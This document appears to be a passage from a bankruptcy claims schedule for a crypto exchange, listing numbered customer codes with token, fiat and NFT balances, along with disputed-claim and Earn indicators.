| 07315529 | | BTC[0], DOGE[0], LTC[0], SOL[0], SUSHI[0], UNI[0], USD[0.00], USDT[0] | | |
| 07315549 | | BAT[1.01070351], BRZ[5], DOGE[4.01244386], GRT[2.00395769], LINK[1.05875415], TRX[1] | Yes | |
| 07315553 | | BTC[0.00003478], ETH[0.00064304], ETHW[0.00064304], NFT (47307172205046799447FTX - Off The Grid Miami #4411)[1], NFT (49864202161861858247Brooklyn Bridge - BLUE)[1], SOL[.0042], USD[0.00], USDT[812.73715935] | | |
| 07315554 | | USD[0.00], USDT[0] | | |
| 07315558 | | DOGE[1686.71273940] | | |
| 07315574 | | BTC[.79347885], DOGE[121925.27008187], ETH[.00041703], ETHW[0.00041702], SUSHI[835.885], USD[0.72], USDT[0] | | |
| 07315585 | | USD[0.01], USDT[0.00000001] | | |
| 07315588 | | USD[0.00] | | |
| 07315590 | | BTC[0.00724339], DOGE[0], ETH[0], ETHW[0], LINK[7], MATIC[11], SOL[2], SUSHI[0], USD[0.00], USDT[0] | | |
| 07315599 | | BTC[0], DOGE[0], ETH[.00000001], ETHW[0], GRT[0], TRX[0], USD[0.00] | | |
| 07315603 | | BCH[0], BTC[0], DOGE[0], ETH[0], ETHW[0], LINK[0], LTC[0], SUSHI[0], USD[52.86] | | |
| 07315605 | | BTC[0.00444474], DOGE[.54], ETH[.00000001], USDT[0.00000309] | | |
| 07315620 | | DOGE[.567] | | |
| 07315632 | | BTC[0], ETH[0], ETHW[0], USD[0.00], USDT[0] | | |
| 07315634 | | NFT (569613793689811320/LA playoff baseball )[1], USD[5.00] | | |
| 07315635 | | USD[5.03] | | |
| 07315649 | | USD[0.07], USDT[.01584323] | | |
| 07315653 | | DOGE[0], USD[0.00] | | |
| 07315660 | | BTC[0], DOGE[0], ETH[0], ETHW[0], LINK[.00000001], SUSHI[0] | | |
| 07315666 | | BTC[0.05050000], DOGE[0.70451401], ETH[0], GRT[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[410.20], USDT[0.00000001], YFI[0] | | |
| 07315668 | | AAVE[.00666337], BTC[0], MATIC[.03081699], SOL[.0044759], USD[0.00], USDT[.0095] | | |
| 07315676 | | TRX[.936], USD[1.00] | | |
| 07315677 | | BTC[.000038], DOGE[3722.392], ETH[.261948], ETHW[.261948], LTC[3.20712], USD[0.27] | | |
| 07315698 | | SOL[.6380929] | | |
| 07315699 | | DOGE[0], LINK[0], SUSHI[0] | | |
| 07315700 | | BTC[0], COMP[.1619925], DOGE[546], ETH[0], GRT[75], SOL[1.16421719], SUSHI[10.01655087], USD[0.00], USDT[0.00000002] | | |
| 07315702 | | AAVE[.00812], BTC[0.00005661], LINK[.0845], SOL[.0057], USD[0.65], USDT[0.32992510], YFI[.0007598] | | |
| 07315712 | | DOGE[0], ETH[.00000001], USD[0.00] | | |
| 07315719 | | BTC[0.00004923], DAI[.00000001], NFT (513282697712613375/Imola Ticket Stub #1218)[1], SOL[.00000001], USD[0.01], USDT[0] | | |
| 07315725 | | BTC[0], DOGE[0], ETH[0], LTC[0], USDT[0.00014048] | | |
| 07315728 | | DOGE[0.86895314], USD[1.06] | | |
| 07315730 | | SOL[.0058545], USD[3047.99], USDT[0.00000001] | | |
| 07315736 | | DOGE[0], ETH[0], SOL[0], SUSHI[0], USD[1.15] | | |
| 07315737 | | DOGE[0], USD[0.33] | | |
| 07315740 | | BTC[0.00009469], DOGE[.203], ETH[.00048], ETHW[.00048], USD[0.00] | | |
| 07315750 | | ETH[0.01926994], SOL[53.89202452], USD[3.52] | | |
| 07315755 | | BRZ[1], DOGE[2], ETH[.00000132], ETHW[.00000132], NFT (374669153544022812/Internet Kids #187)[1], SHIB[1], SOL[.00003689], USD[0.00] | Yes | |
| 07315759 | | ETH[0] | | |
| 07315761 | | BTC[.0053572], DOGE[.944], USD[1.34] | | |
| 07315764 | | BTC[0], USD[0.00] | | |
| 07315768 | | DOGE[.833], SHIB[23672590], USD[0.16] | | |
| 07315771 | | BTC[0], USD[0.00], USDT[0] | | |
| 07315776 | | DOGE[0], USD[0.02] | | |
| 07315783 | | DOGE[.364], USD[0.01], USDT[63.63697731] | | |
| 07315784 | | SUSHI[.358], USD[1.62] | | |
| 07315793 | | DOGE[0], USD[0.00] | | |
| 07315802 | | ETHW[.000505], USD[0.00] | | |
| 07315804 | | DOGE[.31565], SHIB[30722.06117745], USD[1123.09] | | |
| 07315810 | | BAT[.484], BTC[0], ETHW[1], USD[0.00] | | |
| 07315811 | | DAI[.04715342], USD[0.01] | | |
| 07315818 | | BTC[0], ETH[0.05255768], DOGE[0], ETH[0.05255768], SOL[2.56379110], SUSHI[0], UNI[0], USD[0.00] | | |
| 07315821 | | BF_POINT[100], USD[2.70] | | |
| 07315825 | | BTC[0], ETH[0], LINK[.05761617], MATIC[1.61035445], NFT (310639067421432644/2974 Floyd Norman - OKC 6-0232)[1], NFT (396858802043111655/2974 Floyd Norman - OKC 5-0041)[1], NFT (505905479320726132/FTX - Off The Grid Miami #427)[1], USD[0.00], USDT[0.00000001] | | |
| 07315828 | | BTC[.0200734], DOGE[9115.989], ETH[.210684], ETHW[.210684], USD[60.42], USDT[0] | | |
| 07315830 | | BTC[0], DOGE[0], TRX[0], USD[0.00] | | |
| 07315831 | | USD[0.00] | | |
| 07315832 | | BTC[0.00000280], ETH[0], ETHW[0.43656692], SOL[.00005], USD[787.09] | | |
| 07315835 | | BTC[0.00499500], DOGE[0.13937151], ETH[0.16083900], ETHW[0.16083900], GRT[117.504], SUSHI[0], USD[0.22], USDT[0.00000001] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07315842 | | BTC[0], ETH[0], LINK[0], USD[0.01], USDT[0] | | |
| 07315849 | | BF_POINT[300], BTC[0.00009980], DAI[0], DOGE[0], LINK[.00008235], SOL[0], TRX[0], UNI[.72469286], USD[21.20], USDT[.00046] | | |
| 07315851 | | DOGE[2580.39081154], TRX[2205.96945332], USD[0.00] | | |
| 07315853 | | BTC[0], DOGE[30.7644], ETHW[1.92988824], GRT[.8138], SOL[1.15], UNI[.0981], USD[0.01] | | |
| 07315858 | | DOGE[0], SHIB[1581084.78403785], USD[0.00] | | |
| 07315862 | | ETH[0], USD[0.00], USDT[0.00000010] | | |
| 07315864 | | BAT[0], BTC[0], ETH[0.18915300], ETHW[0.18915300], SOL[13.14179000], USD[513.49], USDT[0.58643893] | | |
| 07315866 | | BTC[0], DOGE[0], LTC[0.00396995] | | |
| 07315869 | | ETH[.00002193], ETHW[.00002193], SOL[3.1872], USD[201.40] | | |
| 07315873 | | DOGE[.5732], ETH[0.00000001], ETHW[0], SOL[.0686], SUSHI[.3176431], USD[0.00] | | |
| 07315882 | Contingent, Unliquidated | AVAX[0.03139379], BTC[.0000735], DOGE[0], ETH[0.00059822], ETHW[0.80299959], SOL[0], USD[6000.00] | | |
| 07315887 | | DOGE[0], SOL[0], SUSHI[0], USD[0.00] | | |
| 07315894 | | NFT (5237145364264206806/FTX Crypto Cup 2022 Key #2386)[1] | | |
| 07315906 | Contingent, Disputed | BTC[0], DOGE[0.54161685], USD[0.00], USDT[0.00000001] | | |
| 07315920 | | BTC[.000498], USD[1.05] | | |
| 07315922 | | DOGE[0], LINK[0], USD[0.00], USDT[0] | | |
| 07315923 | | NFT (4457783669091807713/Bahrain Ticket Stub #339)[1] | | |
| 07315927 | Contingent, Disputed | USD[0.00], USDT[0] | | |
| 07315934 | | BTC[0], USD[6.53] | | |
| 07315941 | Contingent, Disputed | BTC[0], DOGE[0], SUSHI[0], USD[16.56], USDT[0] | | |
| 07315943 | | BTC[0], DOGE[.98169314], USD[0.01] | | |
| 07315944 | | AAVE[.00201], BTC[0], ETH[0], SOL[0.00462239], SUSHI[0], USDT[0.01999030] | | |
| 07315952 | | BTC[.00000461], DOGE[.56139758], GRT[.08], SOL[0], USD[0.00], USDT[1.33737559] | | |
| 07315955 | | BTC[0], ETH[.00052981], ETHW[0.00052981], LTC[.00066576], MATIC[1.86], SOL[.00763207], USD[0.06], USDT[0.00000001] | | |
| 07315956 | | AVAX[35.7642], BTC[0.06975158], DOGE[0.91345132], ETH[1.69605183], ETHW[1.69605183], KSHIB[4185.81], LTC[.00481592], SHIB[399600], SOL[23.02000000], TRX[0], USD[5.35], USDT[0] | | |
| 07315957 | | ETH[0], ETHW[0.00094270], SOL[.008], USD[0.63] | | |
| 07315961 | | BTC[0], LTC[0], USD[0.00], USDT[0] | | |
| 07315963 | | DOGE[0], USD[0.00] | | |
| 07315964 | | BTC[0], SOL[0], USD[0.00], USDT[0] | | |
| 07315974 | | ETH[0], MATIC[0], SOL[0.40398579], USD[0.00] | | |
| 07315979 | | BTC[.00005887], ETH[.00005739], ETHW[.80805739], SOL[.00901485], UNI[.08385], USD[0.00], USDT[0] | | |
| 07315989 | | SOL[.51441122], USD[0.00] | | |
| 07315997 | | USD[0.52] | | |
| 07316014 | | ETH[.00096729], ETHW[.00096729], SHIB[0], SOL[0], USD[0.00], USDT[0.00002508] | | |
| 07316028 | | DOGE[.135], ETHW[.000688], SOL[0], USD[0.00] | | |
| 07316029 | | BTC[0], SOL[9.31247114], USD[1.25] | | |
| 07316030 | | ETH[.005], ETHW[.005], USD[0.00], USDT[0] | | |
| 07316031 | | DOGE[87], ETH[.0009084], ETHW[.0009084], USD[0.28] | | |
| 07316033 | | ALGO[0], BTC[0], ETHW[.101], LTC[0], SOL[0], USD[0.00] | | |
| 07316036 | | BTC[0], DOGE[0], TRX[.473357], USD[0.00] | | |
| 07316042 | | DOGE[.455], ETHW[.15676316], SOL[1.3916], USD[3243.82] | | |
| 07316043 | | BTC[0.00004430], DOGE[.90292941], LTC[.00299], TRX[.4956], USD[0.00], USDT[0] | | |
| 07316047 | | BTC[0.03810000], DOGE[0.97890087], USD[0.40] | | |
| 07316048 | | TRX[.00002], USD[0.15], USDT[0] | | |
| 07316049 | | TRX[.000002], USD[0.00] | | |
| 07316050 | | MATIC[0], NEAR[0], SOL[0], USD[0.00] | | |
| 07316051 | | NFT (3338117618006580835/Entrance Voucher #4326)[1] | | |
| 07316053 | | USD[10.00] | | |
| 07316057 | Contingent, Unliquidated | AVAX[0], BAT[0], BTC[0], DOGE[0], ETH[0], ETHW[0], LINK[0], LTC[0], NEAR[0], NFT (3279993916223545511/Matrix Grids #2)[1], SOL[0], TRX[0], UNI[0], USD[291.68] | Yes | |
| 07316059 | | BTC[.00532842] | | |
| 07316060 | | DOGE[0], LTC[0], SHIB[51.7559438], USD[0.00] | | |
| 07316062 | | DOGE[.956], USD[3.37] | | |
| 07316064 | | BTC[0.04184677], DOGE[27.99240000], ETH[.1717967], ETHW[.1717967], SOL[5.6218015], TRX[228.5858], USD[1.52] | | |
| 07316065 | | SOL[182.268], USD[22.87], USDT[14.989461] | | |
| 07316066 | | NFT (3626862430997472139/FTX - Off The Grid Miami #221)[1] | | |
| 07316079 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07316081 | Contingent, Disputed | USD[10.00] | | |
| 07316088 | | BTC[0], TRX[0], USD[0.02], USDT[0.00022428] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07316096 | | USD[0.18] | | |
| 07316097 | | BTC[0.00005553], ETH[.00078465], ETHW[.00078465], USD[0.98] | | |
| 07316102 | | ETH[.000332], ETHW[.000332], USD[0.43] | | |
| 07316105 | | BTC[.000144], DOGE[0], SOL[0], TRX[0], UNI[0], USD[0.00], USDT[0.00021066] | | |
| 07316109 | | BTC[0], DOGE[0], GRT[0], LINK[0], LTC[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07316110 | | SHIB[6693300], USD[54.18], YFI[.000992] | | |
| 07316113 | | DOGE[0], GRT[0], SOL[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07316114 | | DOGE[842.00645], USD[0.11] | | |
| 07316115 | | BTC[.00000101], SOL[.00000001], USD[0.00], USDT[.2617454] | | |
| 07316127 | | BTC[0.00008245], NFT (29688534699046264117/Night Light #546)[1], NFT (42438209818042469 2/Sun Set #601)[1], NFT (56378258829486464 5/Sun Set #680)[1], USD[1.45], USDT[3.20948160] | | |
| 07316132 | | BTC[.00055947], DOGE[0], ETH[.003984], ETHW[.003984], USD[15.58] | | |
| 07316133 | | BTC[0], SUSHI[.32614535] | | |
| 07316136 | | USD[10.00] | | |
| 07316142 | | DOGE[.64269184], USD[11.76] | | |
| 07316143 | | USD[10.00] | | |
| 07316147 | | DOGE[24.68697306], USD[0.76] | | |
| 07316152 | | BCH[0], DOGE[0], ETH[0.00200000], ETHW[0.00200000], USD[0.00] | | |
| 07316166 | | USD[2.76] | | |
| 07316168 | | BTC[0], USD[2.20] | | |
| 07316180 | | DOGE[4.73706737], USD[0.00] | | |
| 07316186 | | BTC[0], DOGE[0.47000000], LINK[0], LTC[0], USD[0.60] | | |
| 07316187 | | DOGE[708], SHIB[5200000], SOL[1.37], SUSHI[16], USD[2.63] | | |
| 07316196 | | AAVE[.98757863], BTC[0], DOGE[0.46705969], SOL[2.10559467], USD[0.00], USDT[0.20484617] | | |
| 07316205 | | SUSHI[70.72592787], USDT[1.216378] | | |
| 07316218 | | DOGE[.2728], ETH[0], ETHW[0], USD[2.96] | | |
| 07316223 | | DOGE[0], ETH[0] | | |
| 07316224 | | BTC[0], SUSHI[0], USD[3.56] | | |
| 07316255 | | BTC[.00264774], DOGE[2521.29054482], USD[0.00] | | |
| 07316256 | | USD[0.00] | | |
| 07316258 | | DOGE[0], USDT[0] | | |
| 07316264 | | BTC[.00003774] | | |
| 07316267 | | BTC[0], DOGE[0.34146419], USD[0.00] | | |
| 07316271 | | DOGE[0], ETH[0], SOL[0] | | |
| 07316273 | | BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], TRX[.000002], USD[0.80], USDT[0.00000024] | | |
| 07316274 | | USD[10.00] | | |
| 07316277 | | ETHW[0], USD[2.00], USDT[0.00000001] | | |
| 07316284 | | DOGE[0], GRT[0], USD[0.00], USDT[0] | | |
| 07316295 | | DOGE[377.75498612], USD[0.00] | | |
| 07316299 | | BTC[0], DOGE[0], ETH[0], ETHW[0], GRT[0], LINK[0], LTC[0], SUSHI[0], UNI[0], USD[0.00] | | |
| 07316304 | | DOGE[.01536815], USD[0.00] | | |
| 07316308 | | BTC[.00239444], DOGE[159.79], LTC[.20410469], USD[0.00] | | |
| 07316316 | | BTC[0], DOGE[.863], ETH[.00071315], ETHW[0.00071314], SOL[.00000001], USD[0.01], USDT[0.00001361] | | |
| 07316318 | | SOL[0.00189676], USD[0.00], USDT[.008334] | | |
| 07316323 | | BTC[0], DOGE[0], ETH[0], ETHW[0.22335155], USD[1000.19], USDT[0.00000877] | | |
| 07316324 | | BTC[0], ETH[0], SOL[0], SUSHI[0], USD[0.00] | | |
| 07316326 | | BTC[0], USD[0.00] | | |
| 07316329 | | BTC[.08389489], SOL[36.6104015], USD[236.02609445], USD[20.43] | | |
| 07316332 | | NFT (57335740274781824 7/Humpty Dumpty #906)[1] | | |
| 07316333 | | BRZ[0], BTC[0.03964616], ETH[0.22878986], ETHW[0.22878986], GRT[16], LINK[6.23180508], LTC[0.72107632], SOL[3], SUSHI[17.58837814], TRX[1633.77320691], UNI[1.8], USD[2010.29] | | |
| 07316334 | | USD[0.06] | | |
| 07316342 | | DOGE[8401.51346526], USD[0.00] | | |
| 07316343 | | USD[10.00] | | |
| 07316344 | | BTC[0], USD[1.13] | | |
| 07316352 | | DOGE[.45589358], USD[0.00], USDT[0] | | |
| 07316354 | | BTC[0], DOGE[0], ETH[0], ETHW[0], SUSHI[0], USD[0.00] | | |
| 07316357 | | BCH[.000887], BTC[0], DOGE[.4182], ETH[.000789], ETHW[.000789], LTC[.00242], SOL[.01186], TRX[752.976], USD[5.64], USDT[0.61566747] | | |
| 07316358 | | DOGE[2.988], ETH[.364635], ETHW[.364635], USD[0.18], USDT[0.00502936] | | |
| 07316372 | | NFT (41272449556706585 2/DarkPunk #8110)[1], NFT (42808918682228813 9/Lord of Darkness)[1], SOL[0], USD[0.54] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07316373 | | BTC[0.00010488], CUSDT[55], DOGE[0], SOL[.00999], USD[0.00], USDT[0.00004724] | | |
| 07316375 | | ETHW[.00005876], USD[15.11] | | |
| 07316377 | | DOGE[0], ETH[0], USD[0.00] | | |
| 07316378 | | USD[1.62], USDT[0] | | |
| 07316379 | | DOGE[0], SOL[0], USD[0.00] | | |
| 07316391 | | DOGE[.9028], USD[18.31], USDT[0.06912567] | | |
| 07316395 | | BTC[0], DOGE[10.42455745], TRX[.000001], USD[1.42], USDT[0], WBTC[0] | | |
| 07316399 | | BTC[.0000944], USD[0.00] | | |
| 07316403 | | SOL[0], TRX[974.08842752], USD[0.05] | | |
| 07316408 | | AVAX[.0581], BTC[0], SHIB[98860], SOL[.00976189], USD[0.66] | | |
| 07316409 | | BTC[.00001341], DOGE[.1001], ETH[.00028381], ETHW[.00028381], GRT[.20144464], LINK[.06419168], USD[0.00], USDT[0.00959401] | | |
| 07316415 | | ETH[0], SUSHI[0], USD[0.00] | | |
| 07316424 | | BTC[0], DOGE[0], ETH[0], SUSHI[0], USD[0.00] | | |
| 07316427 | | DOGE[.7332768], USD[2.17], USDT[.83512125] | | |
| 07316434 | | DOGE[869.70562781], USD[0.00] | | |
| 07316439 | | ETH[0], USD[0.34] | | |
| 07316441 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07316442 | | USD[42.35] | | |
| 07316445 | | DOGE[0], TRX[29.88], USD[0.02] | | |
| 07316448 | | BTC[.00003816], ETHW[.0008846], USD[0.04] | | |
| 07316451 | | AAVE[.00589475], ETH[.00086], ETHW[.00086], GRT[753.188575], LINK[.0057425], MATIC[5.75], MKR[.00002185], SOL[0.00911915], SUSHI[.1876825], UNI[.030113], USD[6.00], USDT[48.59558641], YFI[.0001405] | | |
| 07316454 | | BAT[0], BTC[0], DOGE[0], LINK[0], SOL[0], UNI[0], USD[0.12], USDT[0], WBTC[0], YFI[0] | | |
| 07316466 | | NFT [2911711883862352441/Invitation: Royal Bears][1], NFT [318123963367068723/Skyline FLP][1], NFT [365832546179548680/Pudgy Pigeons #231][1], NFT [394028195511113763/RedButo #2546][1], NFT [420094188437533447/Belugie #2980][1], NFT [481248813558164731/SKYLINE #4312][1], NFT [484316040137366633/RedButo #2554][1], NFT [488283493664741625/Soulless #6197][1], NFT [491935635339627234/O.R.C #3924][1], NFT [495262653356841368/#2452 Orc Racing Car][1], NFT [513712054061137461/Pudgy Pigeons #431][1], NFT [517832005980320938/Join the Resistance][1], NFT [534631922994541253/Soulless #5588][1], NFT [544607744505179720/Soulless Pets #2495][1], NFT [551363624649077147/BabyApe #1739][1], NFT [557559177312550028/RedButo #2552][1], SOL[0], USD[1.18], USDT[0.00000001] | | |
| 07316469 | | USD[0.00] | | |
| 07316473 | | DOGE[124.84994678], USD[0.94], USDT[0] | | |
| 07316475 | | DOGE[.07365755], USD[0.00] | | |
| 07316477 | | USD[0.00], USDT[0] | | |
| 07316487 | | ETHW[1.041352], TRX[.778], USD[0.04], USDT[13.11592844] | | |
| 07316489 | | AVAX[.006805], BRZ[1], BTC[.00000136], CUSDT[29], DOGE[4], ETH[.01248279], ETHW[.0123322], GRT[3.06999536], LINK[1.08033481], SOL[.006546], TRX[12.02590521], USD[0.01], USDT[1.06925077] | Yes | |
| 07316491 | | BTC[.00219766], SOL[1.39654310], USD[38.33] | | |
| 07316492 | | CUSDT[1], ETH[0], ETHW[0], TRX[2], USD[0.71], YFI[0] | | |
| 07316494 | | USDT[0.00000050] | | |
| 07316498 | | BRZ[1], DOGE[.23738892], ETH[0.00534229], ETHW[0.00527389], TRX[2.000006], USD[17.34], USDT[0] | Yes | |
| 07316499 | | BAT[3.25767969], BRZ[4], BTC[0], CUSDT[8], DAI[0], DOGE[0.05415466], ETH[0], GRT[2.00601797], MATIC[0.02054232], SOL[0], TRX[11.01091813], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07316500 | | SHIB[1], SOL[.00000001], USD[173.44], USDT[0.00000001] | | |
| 07316502 | | USD[10.00] | | |
| 07316503 | | SHIB[2], USD[0.00] | Yes | |
| 07316504 | | USD[0.00] | Yes | |
| 07316507 | | USD[1.18] | | |
| 07316509 | | BTC[0], DOGE[0], ETH[0], ETHW[0], NFT [507210108427670852/SolTimber Seed][1], SOL[0], USD[0.01] | | |
| 07316511 | | DOGE[.291], ETH[.20348788], ETHW[.20348788], USD[1.71] | | |
| 07316512 | | TRX[.000001], USD[0.27], USDT[0.00000147] | | |
| 07316513 | | USD[0.00], USDT[0] | | |
| 07316514 | | SOL[.23512134], USD[0.00] | Yes | |
| 07316515 | | USD[0.00] | | |
| 07316516 | | USD[10.00] | | |
| 07316521 | | USD[10.00] | | |
| 07316522 | | BRZ[1], CUSDT[4], DOGE[1], ETH[0], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[1], USD[0.00] | Yes | |
| 07316524 | | BTC[.00132192], CUSDT[1], USD[19.16] | Yes | |
| 07316525 | | USD[10.00] | | |
| 07316527 | | ETHW[1.46510231], SHIB[1], USD[0.04] | Yes | |
| 07316528 | | USD[11.08] | Yes | |
| 07316529 | | LINK[.06335961], USD[10.00] | | |
| 07316530 | | USD[10.00] | | |
| 07316531 | | BAT[1.01655549], BRZ[2], CUSDT[4], DOGE[9.14663225], ETH[0], ETHW[0.00095378], GRT[3.03094846], TRX[2], USD[10003.29], USDT[1.00848328] | Yes | |
| 07316532 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07316533 | | BTC[0], SOL[0], USD[0.00] | Yes | |
| 07316534 | | USD[10.00] | | |
| 07316535 | | DOGE[1708.95568296] | | |
| 07316536 | | DOGE[0], ETH[0], ETHW[0.12909747], TRX[1], USD[0.44], USDT[0] | Yes | |
| 07316537 | | BAT[2], BRZ[1], DOGE[3], TRX[4], USD[0.00] | | |
| 07316538 | | NFT (37130310747091027/2/Beasts #250)[1], USD[0.00] | | |
| 07316539 | | USD[10.00] | | |
| 07316540 | | BTC[0], CUSDT[3], DOGE[0], ETH[0], SOL[0], USD[0.18], USDT[0] | | |
| 07316542 | | USD[10.00] | | |
| 07316543 | | USD[10.00] | | |
| 07316544 | | BAT[2], BRZ[1], CUSDT[5], DOGE[6.84228429], ETH[.10646043], ETHW[.10646043], SOL[.00028682], SUSHI[17.38152273], TRX[2255.88456562], USD[333.31] | | |
| 07316545 | | USD[15.00] | | |
| 07316547 | | SOL[0.00134594], USD[0.01], USDT[0.00000159] | | |
| 07316548 | | DOGE[1], GRT[7.88478349], USD[0.00] | | |
| 07316549 | | USD[10.00] | | |
| 07316550 | | BTC[0], SUSHI[0], USD[0.00], USDT[0.00000001] | | |
| 07316551 | | BTC[.00006948], ETH[.00013749], ETHW[.00013749], USD[0.00], USDT[0] | | |
| 07316553 | | SOL[0], USD[2.79], USDT[0.00000001] | | |
| 07316554 | | BAT[1], BRZ[1], CUSDT[2], DOGE[0], ETH[0], ETHW[0.00024218], GRT[1.00316908], SHIB[6], SOL[0], TRX[6], USD[0.00] | Yes | |
| 07316555 | | USD[10.00] | | |
| 07316557 | | CUSDT[1], SUSHI[.70335492], USD[0.00] | | |
| 07316558 | | BRZ[6.22321962], CUSDT[35], KSHIB[2040.59818678], NFT (385871526722930448/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #88)[1], NFT (491725744941600449/Freedom)[1], NFT (544220711229091605/Luke )[1], SHIB[63.58139295], SOL[.00000001], TRX[10.01149514], USD[9902.78] | Yes | |
| 07316560 | | USD[10.00] | | |
| 07316561 | | LTC[.00598092], USD[0.00] | Yes | |
| 07316562 | | USD[10.00] | | |
| 07316563 | | DOGE[1], SOL[0], USD[0.00] | Yes | |
| 07316564 | | USD[10.00] | | |
| 07316565 | | BAT[1.01441925], BRZ[5.07915917], BTC[0.00000055], CUSDT[5], DOGE[0.03036941], ETH[0.00002239], ETHW[2.45356940], GRT[1], LINK[0], LTC[0], NFT (551905630419719920/Entrance Voucher #1806)[1], SHIB[1], SOL[0], SUSHI[1.08157657], TRX[14.29468462], UNI[0.00000976], USD[4.18], USDT[1.10006409] | Yes | |
| 07316566 | | USD[10.00] | | |
| 07316567 | | USD[10.00] | | |
| 07316568 | | BTC[0], DOGE[0], ETH[0], MATIC[0], NFT (315470348215342802/Gloom Punk #1654)[1], SOL[0], USD[0.00] | | |
| 07316570 | | BRZ[0.00006053], BTC[0], DOGE[3], ETH[0], ETHW[0], LINK[0], SOL[0], SUSHI[0], TRX[4], UNI[0], USD[0.25], USDT[0.00000003] | Yes | |
| 07316571 | | USD[0.00] | | |
| 07316572 | | BTC[.00016782], USD[0.00] | | |
| 07316573 | | CUSDT[1], USD[10.00] | | |
| 07316575 | | USD[10.00] | | |
| 07316576 | | AAVE[0], BAT[4.39051762], BRZ[2], CUSDT[10], DOGE[13.90338967], GRT[6.34661678], MATIC[0], SOL[0], TRX[6], USD[0.00], USDT[3.28325216] | Yes | |
| 07316577 | | LINK[.43219121], USD[0.00] | Yes | |
| 07316579 | | CUSDT[39], DOGE[10.39945951], TRX[1], USD[0.00] | Yes | |
| 07316581 | | BTC[0], ETH[0], LTC[0], SOL[0], USD[0.01], USDT[0] | | |
| 07316582 | | CUSDT[3], DOGE[0], SHIB[1], TRX[1], USD[1.55] | | |
| 07316583 | | CUSDT[7], TRX[1], USD[0.69] | | |
| 07316584 | | LTC[0], USD[10.00] | | |
| 07316585 | | USD[0.00] | | |
| 07316586 | | USD[10.00] | | |
| 07316587 | | AVAX[.7329736], BRZ[1], CUSDT[19], DOGE[24.25476402], LINK[89.46626065], MATIC[94.361031], SHIB[9], TRX[2], USD[0.00] | Yes | |
| 07316588 | | USD[10.00] | | |
| 07316589 | | USD[10.00] | | |
| 07316591 | | USD[10.00] | | |
| 07316592 | | CUSDT[2], DOGE[0], ETH[.00002853], ETHW[.00002853], GRT[1], TRX[214.76892634], USD[0.00] | | |
| 07316594 | | ETHW[.06299438], TRX[1], USD[318.36], USDT[1.0450809] | Yes | |
| 07316595 | | BRZ[1], DOGE[2], ETH[0], SOL[0], TRX[2], USD[0.00] | Yes | |
| 07316596 | | BTC[0.00002721], ETHW[10.1920785], MATIC[.91606], SOL[0.00628353], USD[25010.14], USDT[0] | | |
| 07316597 | | USD[0.00] | | |
| 07316598 | | DOGE[247.073], USDT[2.52661008] | | |
| 07316599 | | BTC[.00004487], TRX[.000003], UNI[.00000001], USDT[0] | | |
| 07316600 | | BAT[1], BRZ[1], DOGE[5847.86811382], ETH[0], GRT[2], TRX[2], USD[0.00] | | |
| 07316601 | | SOL[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07316602 | | ETHW[4.65892421], USD[0.00], USDT[0] | Yes | |
| 07316603 | | BAT[2], BRZ[4], CUSDT[4], DOGE[12], ETH[0], ETHW[0.95818419], SHIB[2], SUSHI[0], TRX[10], USD[0.00], USDT[1] | | |
| 07316604 | | BAT[1], DOGE[1], ETH[0], ETHW[0], USD[112.62] | | |
| 07316605 | | BTC[.0443301], DOGE[75.696], ETH[.247508], ETHW[.247508], LTC[2.29116], USD[6.19] | | |
| 07316606 | | BTC[0], DOGE[0], ETH[0.00803351], ETHW[0.00803351], USD[0.00], USDT[0.00000001] | | |
| 07316609 | | AUD[0.00], BRZ[0.00208640], DOGE[0], ETH[0], SOL[0], USD[0.01] | | |
| 07316610 | | DOGE[1], USD[0.00] | | |
| 07316611 | | USD[0.00] | | |
| 07316613 | | DOGE[.629], USD[0.36], USDT[0.00000001] | | |
| 07316614 | | USD[10.00] | | |
| 07316615 | | BTC[.00000004], CUSDT[2], DOGE[0], ETHW[.04535639], TRX[8209.00004014], USD[0.00] | Yes | |
| 07316616 | | BAT[0], BRZ[0], BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], SGD[0.00], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.02], USDT[0], YFI[0] | Yes | |
| 07316618 | | USD[10.00] | | |
| 07316619 | | USD[10.00] | | |
| 07316620 | | USD[10.00] | | |
| 07316621 | | BRZ[2], BTC[0], CUSDT[30], DOGE[0], ETH[0], GRT[0], SOL[0], USD[0.00] | | |
| 07316622 | | USD[10.00] | | |
| 07316624 | | DOGE[1], USD[0.01] | | |
| 07316625 | | CUSDT[2], ETH[0], SOL[.00000001], TRX[1], USD[0.00] | Yes | |
| 07316627 | | BF_POINT[200], DOGE[1], TRX[1], USD[0.01], USDT[0] | Yes | |
| 07316628 | | BRZ[1], BTC[0], CUSDT[2], DOGE[1], ETH[0], TRX[0], USD[11.11] | Yes | |
| 07316630 | | USD[10.00] | | |
| 07316631 | | BTC[0], SUSHI[0.47533760], USD[1.98] | | |
| 07316633 | | USD[0.00], USDT[0] | Yes | |
| 07316634 | | USD[0.00] | | |
| 07316635 | | USD[0.00], USDT[0] | | |
| 07316638 | | USD[0.00] | | |
